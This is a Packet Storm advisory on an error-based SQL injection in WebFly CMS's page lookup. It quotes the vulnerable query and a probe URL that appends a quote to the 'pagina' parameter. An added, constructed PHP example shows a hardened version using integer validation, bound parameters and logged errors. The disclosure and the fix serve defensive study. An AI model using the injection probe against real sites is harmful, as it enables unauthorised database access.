WebFly CMS SQL Injection

2011-03-21T00:00:00
ID PACKETSTORM:99566
Type packetstorm
Reporter MasterGipy
Modified 2011-03-21T00:00:00

Description

`[$] Exploit Title : WebFly CMS Error Based SQL Injection Vulnerability  
[$] Versions Affected : ALL  
[$] Date : 21-03-2011   
[$] Author : MasterGipy  
[$] Email : mastergipy [at] gmail.com  
[$] Bug : Error Based SQL Injection Vulnerability  
[$] Google Dork : [None]  
  
[$] Vulnerable code in /web/inc/paginas/inc.paginas.top.php  
  
$query_DetalhesPagina = sprintf("SELECT * FROM paginas WHERE ID = %s and Activo = 'Y'", GetSQLValueString($colname_DetalhesPagina, "int"));   
  
  
[$] Exploit  
  
[+] http://[site]/index.php?pagina=1 <- [ERROR BASED SQL INJECTION]  
  
  
[+] e.g.   
http://example.pt/index.php?pagina=2'  
  
  
  
[$] Greetings from PORTUGAL ^^  
  
  
  
`
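
A hardened form of the lookup quoted under "Vulnerable code", as an added example that is not part of the original advisory or of the WebFly code base. Only the `paginas` table, its `ID` and `Activo` columns and the `pagina` parameter come from the advisory; the function name, the `Titulo` column, the SQLite in-memory database and its rows are constructed for illustration, and the body of `GetSQLValueString` is not shown on the page, so nothing here depends on it.

```php
<?php
// Added example (not WebFly code). fetchPagina(), the Titulo column and the
// in-memory SQLite database are constructed; paginas/ID/Activo are from the advisory.

function fetchPagina(PDO $db, $rawPagina): ?array
{
    // 1. Strict allow-list: the request value must parse as an integer >= 1.
    //    The advisory's example value "2'" fails here and never reaches SQL.
    $id = filter_var($rawPagina, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bound parameter: the value travels as typed data instead of being
    //    spliced into the statement text the way sprintf("%s") does.
    $stmt = $db->prepare("SELECT * FROM paginas WHERE ID = :id AND Activo = 'Y'");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample database standing in for the CMS's MySQL schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE paginas (ID INTEGER PRIMARY KEY, Titulo TEXT, Activo TEXT)");
$db->exec("INSERT INTO paginas VALUES (1, 'Inicio', 'Y'), (2, 'Contactos', 'Y'), (3, 'Rascunho', 'N')");

// 3. Database errors are written to the server log and the client gets a
//    generic message, so query errors are never reflected in the response.
foreach (['2', "2'", '3', '', 'abc'] as $input) {
    try {
        $page = fetchPagina($db, $input);
        printf("%-6s => %s\n", var_export($input, true),
               $page ? $page['Titulo'] : 'not found');
    } catch (PDOException $e) {
        error_log('paginas lookup failed: ' . $e->getMessage());
        echo "internal error\n";
    }
}
```

Of the five constructed inputs, only `'2'` returns a row (`Contactos`): `'3'` is a valid integer but the page is inactive, and the other three are rejected by the integer check before any query is prepared.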